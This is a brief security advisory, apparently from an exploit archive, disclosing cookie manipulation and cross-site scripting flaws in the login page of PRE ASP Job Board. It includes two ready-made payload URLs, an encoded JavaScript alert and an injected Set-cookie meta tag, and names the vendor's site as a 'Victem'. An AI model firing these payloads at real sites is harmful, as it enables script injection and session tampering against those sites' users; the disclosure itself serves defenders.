Pre ASP Job Board suffers from cookie manipulation and cross site scripting vulnerabilities.
4cb9b455396841958e0937624c126ccfc0832dc1f52b6241e4ca47191e137dc3
#########################################################
---------------------------------------------------------
Portal Name: PRE ASP Job Board
Vendor : http://www.preproject.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (CM,XSS)
---------------------------------------------------------
#########################################################
[XSS]:
http://site.com/[Path]/Employee/emp_login.asp?msg=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281369%29%3B%22%3E
[CM]:
http://site.com/[Path]/Employee/emp_login.asp?msg=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&color=Red&face=verdana&size=2%3EEnter&some&value%21
---------------------------------
Victem :
http://preproject.com/preaspjobboard